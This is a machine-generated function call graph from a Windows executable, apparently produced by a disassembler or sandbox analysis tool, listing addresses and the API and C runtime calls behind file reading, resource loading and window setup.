98152->98157 98156 e18189 59 API calls 98153->98156 99571 e18087 59 API calls Mailbox 98154->99571 98156->98157 98157->98010 98159 e20a9a __write_nolock 98158->98159 99572 e16ee0 98159->99572 98161 e20a9f 98162 e13c26 98161->98162 99583 e212fe 89 API calls 98161->99583 98162->98006 98162->98014 98164 e20aac 98164->98162 99584 e24047 91 API calls Mailbox 98164->99584 98166 e20ab5 98166->98162 98167 e20ab9 GetFullPathNameW 98166->98167 98168 e17d2c 59 API calls 98167->98168 98169 e20ae5 98168->98169 98170 e17d2c 59 API calls 98169->98170 98171 e20af2 98170->98171 98172 e550d5 _wcscat 98171->98172 98173 e17d2c 59 API calls 98171->98173 98173->98162 98175 e13ac2 LoadImageW RegisterClassExW 98174->98175 98176 e4d49c 98174->98176 99622 e13041 7 API calls 98175->99622 99623 e148fe LoadImageW EnumResourceNamesW 98176->99623 98179 e13b46 98181 e139e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98179->98181 98180 e4d4a5 98181->98022 98183 e14406 _memset 98182->98183 99624 e14213 98183->99624 98186 e1448b 98194 e550ed 98193->98194 98206 e20b55 98193->98206 99713 e7a0b5 89 API calls 4 library calls 98194->99713 98200 e20bab PeekMessageW 98269 e20b65 Mailbox 98200->98269 98206->98269 99714 e19fbd 60 API calls 98206->99714 99715 e668bf 341 API calls 98206->99715 98248 e1a000 314 API calls 98248->98269 98252 e20fee Mailbox 98253 e210f5 98252->98253 98252->98269 98256 e17f41 59 API calls 98256->98269 98257 e7a0b5 89 API calls 98257->98269 98258 e19df0 59 API calls Mailbox 98258->98269 98259 e18620 69 API calls 98259->98269 98260 e1b89c 314 API calls 98260->98269 98262 e666f4 59 API calls Mailbox 98262->98269 98263 e18b13 69 API calls 98263->98269 98264 e559ff VariantClear 98264->98269 98265 e55a95 VariantClear 98265->98269 98266 e55843 VariantClear 98266->98269 98267 e67405 59 API calls 98267->98269 98269->98200 98269->98248 98269->98252 98269->98253 98269->98256 98269->98257 98269->98258 98269->98259 98269->98260 98269->98262 98269->98263 98269->98264 98269->98265 98269->98266 98269->98267 98271->98006 98272->98018 98274 e41b90 __write_nolock 98273->98274 98275 e14871 GetModuleFileNameW 98274->98275 98276 e17f41 59 API calls 98275->98276 98277 e14897 98276->98277 98278 e148ae 60 API calls 98277->98278 98279 e148a1 Mailbox 98278->98279 98279->98027 98303 e30ffe 98300->98303 98301 e3594c __crtGetStringTypeA_stat 58 API calls 98301->98303 98302 e31018 98302->98049 98303->98301 98303->98302 98305 e3101c std::exception::exception 98303->98305 98310 e335e1 DecodePointer 98303->98310 98311 e387db RaiseException 98305->98311 98307 e31046 98312 e38711 58 API calls _free 98307->98312 98309 e31058 98309->98049 98310->98303 98311->98307 98312->98309 98314 e13d50 __write_nolock 98313->98314 98315 e17d2c 59 API calls 98314->98315 98320 e13eb6 Mailbox 98314->98320 98317 e13d82 98315->98317 98326 e13db8 Mailbox 98317->98326 98439 e17b52 98317->98439 98318 e17b52 59 API calls 98318->98326 98319 e13e89 98319->98320 98321 e17f41 59 API calls 98319->98321 98320->98056 98323 e13eaa 98321->98323 98322 e17f41 59 API calls 98322->98326 98324 e13f84 59 API calls 98323->98324 98324->98320 98326->98318 98326->98319 98326->98320 98326->98322 98442 e13f84 98326->98442 98452 e14d13 98327->98452 98332 e14f68 LoadLibraryExW 98462 e14cc8 98332->98462 98333 e4dd0f 98334 e14faa 84 API calls 98333->98334 98336 e4dd16 98334->98336 98338 e14cc8 3 API calls 98336->98338 98340 e4dd1e 98338->98340 98488 e1506b 98340->98488 98341 e14f8f 98341->98340 98342 e14f9b 98341->98342 98343 e14faa 84 API calls 98342->98343 98345 e137e6 98343->98345 98345->98063 98345->98064 98348 e4dd45 98496 e15027 98348->98496 98350 e4dd52 98352 e181b2 98351->98352 98353 e13801 98351->98353 98926 e180d7 59 API calls 2 library calls 98352->98926 98355 e193ea 98353->98355 98356 e30ff6 Mailbox 59 API calls 98355->98356 98357 e1380d 98356->98357 98357->98077 98359 e1862b 98358->98359 98361 e18652 98359->98361 98927 e18b13 69 API calls Mailbox 98359->98927 98361->98081 98363 e13f05 98362->98363 98364 e13eec 98362->98364 98366 e17d2c 59 API calls 98363->98366 98365 e181a7 59 API calls 98364->98365 98367 e1388b 98365->98367 98366->98367 98368 e3313d 98367->98368 98369 e33149 98368->98369 98370 e331be 98368->98370 98377 e3316e 98369->98377 98928 e38d68 58 API calls __getptd_noexit 98369->98928 98930 e331d0 60 API calls 3 library calls 98370->98930 98373 e331cb 98373->98102 98374 e33155 98929 e38ff6 9 API calls __beginthread 98374->98929 98376 e33160 98376->98102 98377->98102 98379 e19436 98378->98379 98380 e30ff6 Mailbox 59 API calls 98379->98380 98381 e19444 98380->98381 98382 e13936 98381->98382 98931 e1935c 59 API calls Mailbox 98381->98931 98384 e191b0 98382->98384 98932 e192c0 98384->98932 98386 e30ff6 Mailbox 59 API calls 98388 e13944 98386->98388 98387 e191bf 98387->98386 98387->98388 98389 e19040 98388->98389 98390 e4f5a5 98389->98390 98396 e19057 98389->98396 98390->98396 98942 e18d3b 59 API calls Mailbox 98390->98942 98392 e191a0 98941 e19e9c 60 API calls Mailbox 98392->98941 98393 e19158 98394 e30ff6 Mailbox 59 API calls 98393->98394 98397 e1915f 98394->98397 98396->98392 98396->98393 98396->98397 98397->98130 98399 e15045 85 API calls 98398->98399 98400 e79854 98399->98400 98943 e799be 98400->98943 98403 e1506b 74 API calls 98404 e79881 98403->98404 98405 e1506b 74 API calls 98404->98405 98406 e79891 98405->98406 98407 e1506b 74 API calls 98406->98407 98408 e798ac 98407->98408 98409 e1506b 74 API calls 98408->98409 98410 e798c7 98409->98410 98411 e15045 85 API calls 98410->98411 98412 e798de 98411->98412 98413 e3594c __crtGetStringTypeA_stat 58 API calls 98412->98413 98414 e798e5 98413->98414 98415 e3594c __crtGetStringTypeA_stat 58 API calls 98414->98415 98416 e798ef 98415->98416 98417 e1506b 74 API calls 98416->98417 98418 e79903 98417->98418 98419 e79393 GetSystemTimeAsFileTime 98418->98419 98420 e79916 98419->98420 98421 e79940 98420->98421 98422 e7992b 98420->98422 98424 e79946 98421->98424 98425 e799a5 98421->98425 98423 e32f95 _free 58 API calls 98422->98423 98427 e79931 98423->98427 98949 e78d90 98424->98949 98426 e32f95 _free 58 API calls 98425->98426 98429 e4d3c1 98426->98429 98430 e32f95 _free 58 API calls 98427->98430 98429->98068 98433 e14faa 98429->98433 98430->98429 98432 e32f95 _free 58 API calls 98432->98429 98434 e14fb4 98433->98434 98435 e14fbb 98433->98435 98436 e355d6 __fcloseall 83 API calls 98434->98436 98437 e14fdb FreeLibrary 98435->98437 98438 e14fca 98435->98438 98436->98435 98437->98438 98438->98068 98448 e17faf 98439->98448 98441 e17b5d 98441->98317 98443 e13f92 98442->98443 98447 e13fb4 _memmove 98442->98447 98445 e30ff6 Mailbox 59 API calls 98443->98445 98444 e30ff6 Mailbox 59 API calls 98446 e13fc8 98444->98446 98445->98447 98446->98326 98447->98444 98449 e17fc2 98448->98449 98450 e17fbf _memmove 98448->98450 98451 e30ff6 Mailbox 59 API calls 98449->98451 98450->98441 98451->98450 98501 e14d61 98452->98501 98455 e14d3a 98457 e14d53 98455->98457 98458 e14d4a FreeLibrary 98455->98458 98456 e14d61 2 API calls 98456->98455 98459 e3548b 98457->98459 98458->98457 98505 e354a0 98459->98505 98461 e14f5c 98461->98332 98461->98333 98662 e14d94 98462->98662 98465 e14d94 2 API calls 98468 e14ced 98465->98468 98466 e14d08 98469 e14dd0 98466->98469 98467 e14cff FreeLibrary 98467->98466 98468->98466 98468->98467 98470 e30ff6 Mailbox 59 API calls 98469->98470 98471 e14de5 98470->98471 98666 e1538e 98471->98666 98473 e14df1 _memmove 98474 e14e2c 98473->98474 98476 e14f21 98473->98476 98477 e14ee9 98473->98477 98475 e15027 69 API calls 98474->98475 98484 e14e35 98475->98484 98680 e79ba5 95 API calls 98476->98680 98669 e14fe9 CreateStreamOnHGlobal 98477->98669 98480 e1506b 74 API calls 98480->98484 98482 e14ec9 98482->98341 98483 e4dcd0 98485 e15045 85 API calls 98483->98485 98484->98480 98484->98482 98484->98483 98675 e15045 98484->98675 98486 e4dce4 98485->98486 98487 e1506b 74 API calls 98486->98487 98487->98482 98489 e4ddf6 98488->98489 98490 e1507d 98488->98490 98704 e35812 98490->98704 98493 e79393 98903 e791e9 98493->98903 98495 e793a9 98495->98348 98497 e15036 98496->98497 98498 e4ddb9 98496->98498 98908 e35e90 98497->98908 98500 e1503e 98500->98350 98502 e14d2e 98501->98502 98503 e14d6a LoadLibraryA 98501->98503 98502->98455 98502->98456 98503->98502 98504 e14d7b GetProcAddress 98503->98504 98504->98502 98507 e354ac __getstream 98505->98507 98506 e354bf 98554 e38d68 58 API calls __getptd_noexit 98506->98554 98507->98506 98509 e354f0 98507->98509 98524 e40738 98509->98524 98510 e354c4 98555 e38ff6 9 API calls __beginthread 98510->98555 98513 e354f5 98514 e3550b 98513->98514 98515 e354fe 98513->98515 98517 e35535 98514->98517 98518 e35515 98514->98518 98556 e38d68 58 API calls __getptd_noexit 98515->98556 98539 e40857 98517->98539 98557 e38d68 58 API calls __getptd_noexit 98518->98557 98519 e354cf @_EH4_CallFilterFunc@8 __getstream 98519->98461 98525 e40744 __getstream 98524->98525 98526 e39e4b __lock 58 API calls 98525->98526 98527 e40752 98526->98527 98528 e407cd 98527->98528 98534 e39ed3 __mtinitlocknum 58 API calls 98527->98534 98537 e407c6 98527->98537 98562 e36e8d 59 API calls __lock 98527->98562 98563 e36ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98527->98563 98529 e38a5d __malloc_crt 58 API calls 98528->98529 98531 e407d4 98529->98531 98531->98537 98564 e3a06b InitializeCriticalSectionAndSpinCount 98531->98564 98532 e40843 __getstream 98532->98513 98534->98527 98536 e407fa EnterCriticalSection 98536->98537 98559 e4084e 98537->98559 98548 e40877 __wopenfile 98539->98548 98540 e40891 98569 e38d68 58 API calls __getptd_noexit 98540->98569 98541 e40a4c 98541->98540 98545 e40aaf 98541->98545 98543 e40896 98570 e38ff6 9 API calls __beginthread 98543->98570 98566 e487f1 98545->98566 98546 e35540 98558 e35562 LeaveCriticalSection LeaveCriticalSection _fprintf 98546->98558 98548->98540 98548->98541 98571 e33a0b 60 API calls 2 library calls 98548->98571 98550 e40a45 98550->98541 98572 e33a0b 60 API calls 2 library calls 98550->98572 98552 e40a64 98552->98541 98573 e33a0b 60 API calls 2 library calls 98552->98573 98554->98510 98555->98519 98556->98519 98557->98519 98558->98519 98565 e39fb5 LeaveCriticalSection 98559->98565 98561 e40855 98561->98532 98562->98527 98563->98527 98564->98536 98565->98561 98574 e47fd5 98566->98574 98568 e4880a 98568->98546 98569->98543 98570->98546 98571->98550 98572->98552 98573->98541 98575 e47fe1 __getstream 98574->98575 98576 e47ff7 98575->98576 98579 e4802d 98575->98579 98659 e38d68 58 API calls __getptd_noexit 98576->98659 98578 e47ffc 98660 e38ff6 9 API calls __beginthread 98578->98660 98585 e4809e 98579->98585 98582 e48049 98661 e48072 LeaveCriticalSection __unlock_fhandle 98582->98661 98584 e48006 __getstream 98584->98568 98586 e480be 98585->98586 98587 e3471a __wsopen_nolock 58 API calls 98586->98587 98590 e480da 98587->98590 98588 e39006 __invoke_watson 8 API calls 98589 e487f0 98588->98589 98591 e47fd5 __wsopen_helper 103 API calls 98589->98591 98592 e48114 98590->98592 98598 e48137 98590->98598 98633 e48211 98590->98633 98593 e4880a 98591->98593 98594 e38d34 __close 58 API calls 98592->98594 98593->98582 98595 e48119 98594->98595 98596 e38d68 __beginthread 58 API calls 98595->98596 98597 e48126 98596->98597 98599 e38ff6 __beginthread 9 API calls 98597->98599 98600 e481f5 98598->98600 98606 e481d3 98598->98606 98624 e48130 98599->98624 98601 e38d34 __close 58 API calls 98600->98601 98602 e481fa 98601->98602 98603 e38d68 __beginthread 58 API calls 98602->98603 98604 e48207 98603->98604 98605 e38ff6 __beginthread 9 API calls 98604->98605 98605->98633 98607 e3d4d4 __alloc_osfhnd 61 API calls 98606->98607 98608 e482a1 98607->98608 98609 e482ce 98608->98609 98610 e482ab 98608->98610 98611 e47f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98609->98611 98612 e38d34 __close 58 API calls 98610->98612 98618 e482f0 98611->98618 98613 e482b0 98612->98613 98615 e38d68 __beginthread 58 API calls 98613->98615 98614 e4836e GetFileType 98616 e48379 GetLastError 98614->98616 98622 e483bb 98614->98622 98619 e482ba 98615->98619 98621 e38d47 __dosmaperr 58 API calls 98616->98621 98617 e4833c GetLastError 98623 e38d47 __dosmaperr 58 API calls 98617->98623 98618->98614 98618->98617 98626 e47f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98618->98626 98620 e38d68 __beginthread 58 API calls 98619->98620 98620->98624 98625 e483a0 CloseHandle 98621->98625 98630 e3d76a __set_osfhnd 59 API calls 98622->98630 98627 e48361 98623->98627 98624->98582 98625->98627 98628 e483ae 98625->98628 98629 e48331 98626->98629 98632 e38d68 __beginthread 58 API calls 98627->98632 98631 e38d68 __beginthread 58 API calls 98628->98631 98629->98614 98629->98617 98636 e483d9 98630->98636 98634 e483b3 98631->98634 98632->98633 98633->98588 98634->98627 98635 e48594 98635->98633 98638 e48767 CloseHandle 98635->98638 98636->98635 98637 e41b11 __lseeki64_nolock 60 API calls 98636->98637 98647 e4845a 98636->98647 98639 e48443 98637->98639 98640 e47f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98638->98640 98642 e38d34 __close 58 API calls 98639->98642 98639->98647 98641 e4878e 98640->98641 98644 e48796 GetLastError 98641->98644 98645 e487c2 98641->98645 98642->98647 98643 e410ab 70 API calls __read_nolock 98643->98647 98646 e38d47 __dosmaperr 58 API calls 98644->98646 98645->98633 98648 e487a2 98646->98648 98647->98635 98647->98643 98649 e40d2d __close_nolock 61 API calls 98647->98649 98650 e4848c 98647->98650 98653 e3dac6 __write 78 API calls 98647->98653 98654 e48611 98647->98654 98655 e41b11 60 API calls __lseeki64_nolock 98647->98655 98652 e3d67d __free_osfhnd 59 API calls 98648->98652 98649->98647 98650->98647 98651 e499f2 __chsize_nolock 82 API calls 98650->98651 98651->98650 98652->98645 98653->98647 98656 e40d2d __close_nolock 61 API calls 98654->98656 98655->98647 98657 e48618 98656->98657 98658 e38d68 __beginthread 58 API calls 98657->98658 98658->98633 98659->98578 98660->98584 98661->98584 98663 e14ce1 98662->98663 98664 e14d9d LoadLibraryA 98662->98664 98663->98465 98663->98468 98664->98663 98665 e14dae GetProcAddress 98664->98665 98665->98663 98667 e30ff6 Mailbox 59 API calls 98666->98667 98668 e153a0 98667->98668 98668->98473 98670 e15020 98669->98670 98671 e15003 FindResourceExW 98669->98671 98670->98474 98671->98670 98672 e4dd5c LoadResource 98671->98672 98672->98670 98673 e4dd71 SizeofResource 98672->98673 98673->98670 98674 e4dd85 LockResource 98673->98674 98674->98670 98676 e4ddd4 98675->98676 98677 e15054 98675->98677 98681 e35a7d 98677->98681 98679 e15062 98679->98484 98680->98474 98685 e35a89 __getstream 98681->98685 98682 e35a9b 98694 e38d68 58 API calls __getptd_noexit 98682->98694 98684 e35ac1 98696 e36e4e 98684->98696 98685->98682 98685->98684 98687 e35aa0 98695 e38ff6 9 API calls __beginthread 98687->98695 98688 e35ac7 98702 e359ee 83 API calls 5 library calls 98688->98702 98691 e35ad6 98703 e35af8 LeaveCriticalSection LeaveCriticalSection _fprintf 98691->98703 98693 e35aab __getstream 98693->98679 98694->98687 98695->98693 98697 e36e80 EnterCriticalSection 98696->98697 98698 e36e5e 98696->98698 98701 e36e76 98697->98701 98698->98697 98699 e36e66 98698->98699 98700 e39e4b __lock 58 API calls 98699->98700 98700->98701 98701->98688 98702->98691 98703->98693 98707 e3582d 98704->98707 98706 e1508e 98706->98493 98708 e35839 __getstream 98707->98708 98709 e3587c 98708->98709 98711 e35874 __getstream 98708->98711 98715 e3584f _memset 98708->98715 98710 e36e4e __lock_file 59 API calls 98709->98710 98712 e35882 98710->98712 98711->98706 98720 e3564d 98712->98720 98734 e38d68 58 API calls __getptd_noexit 98715->98734 98716 e35869 98735 e38ff6 9 API calls __beginthread 98716->98735 98724 e35668 _memset 98720->98724 98726 e35683 98720->98726 98721 e35673 98832 e38d68 58 API calls __getptd_noexit 98721->98832 98723 e35678 98833 e38ff6 9 API calls __beginthread 98723->98833 98724->98721 98724->98726 98729 e356c3 98724->98729 98736 e358b6 LeaveCriticalSection LeaveCriticalSection _fprintf 98726->98736 98728 e357d4 _memset 98835 e38d68 58 API calls __getptd_noexit 98728->98835 98729->98726 98729->98728 98737 e34916 98729->98737 98744 e410ab 98729->98744 98812 e40df7 98729->98812 98834 e40f18 58 API calls 3 library calls 98729->98834 98734->98716 98735->98711 98736->98711 98738 e34920 98737->98738 98739 e34935 98737->98739 98836 e38d68 58 API calls __getptd_noexit 98738->98836 98739->98729 98741 e34925 98837 e38ff6 9 API calls __beginthread 98741->98837 98743 e34930 98743->98729 98745 e410e3 98744->98745 98746 e410cc 98744->98746 98748 e4181b 98745->98748 98753 e4111d 98745->98753 98847 e38d34 58 API calls __getptd_noexit 98746->98847 98862 e38d34 58 API calls __getptd_noexit 98748->98862 98750 e410d1 98848 e38d68 58 API calls __getptd_noexit 98750->98848 98751 e41820 98863 e38d68 58 API calls __getptd_noexit 98751->98863 98755 e41125 98753->98755 98762 e4113c 98753->98762 98849 e38d34 58 API calls __getptd_noexit 98755->98849 98756 e41131 98864 e38ff6 9 API calls __beginthread 98756->98864 98757 e410d8 98757->98729 98759 e4112a 98850 e38d68 58 API calls __getptd_noexit 98759->98850 98761 e41151 98851 e38d34 58 API calls __getptd_noexit 98761->98851 98762->98757 98762->98761 98765 e4116b 98762->98765 98766 e41189 98762->98766 98765->98761 98767 e41176 98765->98767 98768 e38a5d __malloc_crt 58 API calls 98766->98768 98838 e45ebb 98767->98838 98769 e41199 98768->98769 98771 e411a1 98769->98771 98772 e411bc 98769->98772 98852 e38d68 58 API calls __getptd_noexit 98771->98852 98854 e41b11 60 API calls 3 library calls 98772->98854 98773 e4128a 98775 e41303 ReadFile 98773->98775 98780 e412a0 GetConsoleMode 98773->98780 98778 e41325 98775->98778 98779 e417e3 GetLastError 98775->98779 98777 e411a6 98853 e38d34 58 API calls __getptd_noexit 98777->98853 98778->98779 98786 e412f5 98778->98786 98782 e412e3 98779->98782 98783 e417f0 98779->98783 98784 e412b4 98780->98784 98785 e41300 98780->98785 98794 e412e9 98782->98794 98855 e38d47 58 API calls 3 library calls 98782->98855 98860 e38d68 58 API calls __getptd_noexit 98783->98860 98784->98785 98788 e412ba ReadConsoleW 98784->98788 98785->98775 98786->98794 98795 e4135a 98786->98795 98796 e415c7 98786->98796 98788->98786 98791 e412dd GetLastError 98788->98791 98790 e417f5 98861 e38d34 58 API calls __getptd_noexit 98790->98861 98791->98782 98793 e32f95 _free 58 API calls 98793->98757 98794->98757 98794->98793 98798 e413c6 ReadFile 98795->98798 98804 e41447 98795->98804 98796->98794 98799 e416cd ReadFile 98796->98799 98800 e413e7 GetLastError 98798->98800 98809 e413f1 98798->98809 98803 e416f0 GetLastError 98799->98803 98811 e416fe 98799->98811 98800->98809 98801 e41504 98806 e414b4 MultiByteToWideChar 98801->98806 98858 e41b11 60 API calls 3 library calls 98801->98858 98802 e414f4 98857 e38d68 58 API calls __getptd_noexit 98802->98857 98803->98811 98804->98794 98804->98801 98804->98802 98804->98806 98806->98791 98806->98794 98809->98795 98856 e41b11 60 API calls 3 library calls 98809->98856 98811->98796 98859 e41b11 60 API calls 3 library calls 98811->98859 98813 e40e02 98812->98813 98817 e40e17 98812->98817 98898 e38d68 58 API calls __getptd_noexit 98813->98898 98815 e40e07 98899 e38ff6 9 API calls __beginthread 98815->98899 98818 e40e4c 98817->98818 98824 e40e12 98817->98824 98900 e46234 98817->98900 98820 e34916 __fseek_nolock 58 API calls 98818->98820 98821 e40e60 98820->98821 98865 e40f97 98821->98865 98823 e40e67 98823->98824 98825 e34916 __fseek_nolock 58 API calls 98823->98825 98824->98729 98826 e40e8a 98825->98826 98826->98824 98827 e34916 __fseek_nolock 58 API calls 98826->98827 98828 e40e96 98827->98828 98828->98824 98829 e34916 __fseek_nolock 58 API calls 98828->98829 98830 e40ea3 98829->98830 98831 e34916 __fseek_nolock 58 API calls 98830->98831 98831->98824 98832->98723 98833->98726 98834->98729 98835->98723 98836->98741 98837->98743 98839 e45ec6 98838->98839 98840 e45ed3 98838->98840 98841 e38d68 __beginthread 58 API calls 98839->98841 98842 e45edf 98840->98842 98843 e38d68 __beginthread 58 API calls 98840->98843 98844 e45ecb 98841->98844 98842->98773 98845 e45f00 98843->98845 98844->98773 98846 e38ff6 __beginthread 9 API calls 98845->98846 98846->98844 98847->98750 98848->98757 98849->98759 98850->98756 98851->98759 98852->98777 98853->98757 98854->98767 98855->98794 98856->98809 98857->98794 98858->98806 98859->98811 98860->98790 98861->98794 98862->98751 98863->98756 98864->98757 98866 e40fa3 __getstream 98865->98866 98867 e40fc7 98866->98867 98868 e40fb0 98866->98868 98870 e4108b 98867->98870 98873 e40fdb 98867->98873 98869 e38d34 __close 58 API calls 98868->98869 98872 e40fb5 98869->98872 98871 e38d34 __close 58 API calls 98870->98871 98877 e40ffe 98871->98877 98874 e38d68 __beginthread 58 API calls 98872->98874 98875 e41006 98873->98875 98876 e40ff9 98873->98876 98890 e40fbc __getstream 98874->98890 98879 e41013 98875->98879 98880 e41028 98875->98880 98878 e38d34 __close 58 API calls 98876->98878 98882 e38d68 __beginthread 58 API calls 98877->98882 98878->98877 98883 e38d34 __close 58 API calls 98879->98883 98881 e3d446 ___lock_fhandle 59 API calls 98880->98881 98885 e4102e 98881->98885 98886 e41020 98882->98886 98884 e41018 98883->98884 98887 e38d68 __beginthread 58 API calls 98884->98887 98888 e41054 98885->98888 98889 e41041 98885->98889 98892 e38ff6 __beginthread 9 API calls 98886->98892 98887->98886 98893 e38d68 __beginthread 58 API calls 98888->98893 98891 e410ab __read_nolock 70 API calls 98889->98891 98890->98823 98894 e4104d 98891->98894 98892->98890 98895 e41059 98893->98895 98897 e41083 __read LeaveCriticalSection 98894->98897 98896 e38d34 __close 58 API calls 98895->98896 98896->98894 98897->98890 98898->98815 98899->98824 98901 e38a5d __malloc_crt 58 API calls 98900->98901 98902 e46249 98901->98902 98902->98818 98906 e3543a GetSystemTimeAsFileTime 98903->98906 98905 e791f8 98905->98495 98907 e35468 __aulldiv 98906->98907 98907->98905 98909 e35e9c __getstream 98908->98909 98910 e35ec3 98909->98910 98911 e35eae 98909->98911 98913 e36e4e __lock_file 59 API calls 98910->98913 98922 e38d68 58 API calls __getptd_noexit 98911->98922 98915 e35ec9 98913->98915 98914 e35eb3 98923 e38ff6 9 API calls __beginthread 98914->98923 98924 e35b00 67 API calls 6 library calls 98915->98924 98918 e35ed4 98925 e35ef4 LeaveCriticalSection LeaveCriticalSection _fprintf 98918->98925 98920 e35ee6 98921 e35ebe __getstream 98920->98921 98921->98500 98922->98914 98923->98921 98924->98918 98925->98920 98926->98353 98927->98361 98928->98374 98929->98376 98930->98373 98931->98382 98933 e192c9 Mailbox 98932->98933 98934 e4f5c8 98933->98934 98939 e192d3 98933->98939 98935 e30ff6 Mailbox 59 API calls 98934->98935 98937 e4f5d4 98935->98937 98936 e192da 98936->98387 98939->98936 98940 e19df0 59 API calls Mailbox 98939->98940 98940->98939 98941->98397 98942->98396 98944 e799d2 __tzset_nolock _wcscmp 98943->98944 98945 e79866 98944->98945 98946 e1506b 74 API calls 98944->98946 98947 e79393 GetSystemTimeAsFileTime 98944->98947 98948 e15045 85 API calls 98944->98948 98945->98403 98945->98429 98946->98944 98947->98944 98948->98944 98950 e78d9b 98949->98950 98951 e78da9 98949->98951 98952 e3548b 115 API calls 98950->98952 98953 e78dee 98951->98953 98954 e3548b 115 API calls 98951->98954 98965 e78db2 98951->98965 98952->98951 98980 e7901b 98953->98980 98955 e78dd3 98954->98955 98955->98953 98957 e78ddc 98955->98957 98962 e355d6 __fcloseall 83 API calls 98957->98962 98957->98965 98958 e78e32 98959 e78e57 98958->98959 98960 e78e36 98958->98960 98984 e78c33 98959->98984 98961 e78e43 98960->98961 98964 e355d6 __fcloseall 83 API calls 98960->98964 98961->98965 98967 e355d6 __fcloseall 83 API calls 98961->98967 98962->98965 98964->98961 98965->98432 98967->98965 98968 e78e85 98993 e78eb5 98968->98993 98969 e78e65 98971 e78e72 98969->98971 98973 e355d6 __fcloseall 83 API calls 98969->98973 98971->98965 98974 e355d6 __fcloseall 83 API calls 98971->98974 98973->98971 98974->98965 98977 e78ea0 98977->98965 98979 e355d6 __fcloseall 83 API calls 98977->98979 98979->98965 98981 e79040 98980->98981 98983 e79029 __tzset_nolock _memmove 98980->98983 98982 e35812 __fread_nolock 74 API calls 98981->98982 98982->98983 98983->98958 98985 e3594c __crtGetStringTypeA_stat 58 API calls 98984->98985 98986 e78c42 98985->98986 98987 e3594c __crtGetStringTypeA_stat 58 API calls 98986->98987 98988 e78c56 98987->98988 98989 e3594c __crtGetStringTypeA_stat 58 API calls 98988->98989 98990 e78c6a 98989->98990 98991 e78f97 58 API calls 98990->98991 98992 e78c7d 98990->98992 98991->98992 98992->98968 98992->98969 98994 e78eca 98993->98994 98995 e78f82 98994->98995 98997 e78c8f 74 API calls 98994->98997 99000 e78e8c 98994->99000 99026 e78d2b 74 API calls 98994->99026 99027 e7909c 80 API calls 98994->99027 99022 e791bf 98995->99022 98997->98994 99001 e78f97 99000->99001 99002 e78fa4 99001->99002 99003 e78faa 99001->99003 99004 e32f95 _free 58 API calls 99002->99004 99005 e78fbb 99003->99005 99006 e32f95 _free 58 API calls 99003->99006 99004->99003 99007 e32f95 _free 58 API calls 99005->99007 99008 e78e93 99005->99008 99006->99005 99007->99008 99008->98977 99009 e355d6 99008->99009 99010 e355e2 __getstream 99009->99010 99011 e355f6 99010->99011 99012 e3560e 99010->99012 99129 e38d68 58 API calls __getptd_noexit 99011->99129 99014 e36e4e __lock_file 59 API calls 99012->99014 99019 e35606 __getstream 99012->99019 99016 e35620 99014->99016 99015 e355fb 99130 e38ff6 9 API calls __beginthread 99015->99130 99113 e3556a 99016->99113 99019->98977 99023 e791cc 99022->99023 99025 e791dd 99022->99025 99028 e34a93 99023->99028 99025->99000 99026->98994 99027->98994 99029 e34a9f __getstream 99028->99029 99030 e34ad5 99029->99030 99031 e34abd 99029->99031 99032 e34acd __getstream 99029->99032 99033 e36e4e __lock_file 59 API calls 99030->99033 99053 e38d68 58 API calls __getptd_noexit 99031->99053 99032->99025 99035 e34adb 99033->99035 99041 e3493a 99035->99041 99036 e34ac2 99054 e38ff6 9 API calls __beginthread 99036->99054 99044 e34949 99041->99044 99048 e34967 99041->99048 99042 e34957 99105 e38d68 58 API calls __getptd_noexit 99042->99105 99044->99042 99047 e34981 _memmove 99044->99047 99044->99048 99045 e3495c 99106 e38ff6 9 API calls __beginthread 99045->99106 99047->99048 99051 e34916 __fseek_nolock 58 API calls 99047->99051 99056 e3dac6 99047->99056 99084 e3b05e 99047->99084 99107 e34c6d 99047->99107 99055 e34b0d LeaveCriticalSection LeaveCriticalSection _fprintf 99048->99055 99051->99047 99053->99036 99054->99032 99055->99032 99057 e3dad2 __getstream 99056->99057 99058 e3daf6 99057->99058 99059 e3dadf 99057->99059 99060 e3db95 99058->99060 99062 e3db0a 99058->99062 99061 e38d34 __close 58 API calls 99059->99061 99063 e38d34 __close 58 API calls 99060->99063 99064 e3dae4 99061->99064 99065 e3db32 99062->99065 99066 e3db28 99062->99066 99067 e3db2d 99063->99067 99068 e38d68 __beginthread 58 API calls 99064->99068 99070 e3d446 ___lock_fhandle 59 API calls 99065->99070 99069 e38d34 __close 58 API calls 99066->99069 99072 e38d68 __beginthread 58 API calls 99067->99072 99076 e3daeb __getstream 99068->99076 99069->99067 99071 e3db38 99070->99071 99073 e3db4b 99071->99073 99074 e3db5e 99071->99074 99075 e3dba1 99072->99075 99077 e3dbb5 __write_nolock 76 API calls 99073->99077 99079 e38d68 __beginthread 58 API calls 99074->99079 99078 e38ff6 __beginthread 9 API calls 99075->99078 99076->99047 99080 e3db57 99077->99080 99078->99076 99081 e3db63 99079->99081 99083 e3db8d __write LeaveCriticalSection 99080->99083 99082 e38d34 __close 58 API calls 99081->99082 99082->99080 99083->99076 99085 e34916 __fseek_nolock 58 API calls 99084->99085 99086 e3b06c 99085->99086 99087 e3b077 99086->99087 99088 e3b08e 99086->99088 99089 e38d68 __beginthread 58 API calls 99087->99089 99090 e3b093 99088->99090 99099 e3b0a0 __stbuf 99088->99099 99098 e3b07c 99089->99098 99091 e38d68 __beginthread 58 API calls 99090->99091 99091->99098 99092 e3b0fa 99093 e3b104 99092->99093 99094 e3b17e 99092->99094 99096 e3b11e 99093->99096 99101 e3b135 99093->99101 99095 e3dac6 __write 78 API calls 99094->99095 99095->99098 99097 e3dac6 __write 78 API calls 99096->99097 99097->99098 99098->99047 99099->99092 99099->99098 99100 e45ebb __stbuf 58 API calls 99099->99100 99102 e3b0ef 99099->99102 99100->99102 99101->99098 99103 e41a15 __lseeki64 62 API calls 99101->99103 99102->99092 99104 e46234 __getbuf 58 API calls 99102->99104 99103->99098 99104->99092 99105->99045 99106->99048 99108 e34c80 99107->99108 99112 e34ca4 99107->99112 99109 e34916 __fseek_nolock 58 API calls 99108->99109 99108->99112 99110 e34c9d 99109->99110 99111 e3dac6 __write 78 API calls 99110->99111 99111->99112 99112->99047 99114 e35579 99113->99114 99115 e3558d 99113->99115 99162 e38d68 58 API calls __getptd_noexit 99114->99162 99117 e35589 99115->99117 99119 e34c6d __flush 78 API calls 99115->99119 99131 e35645 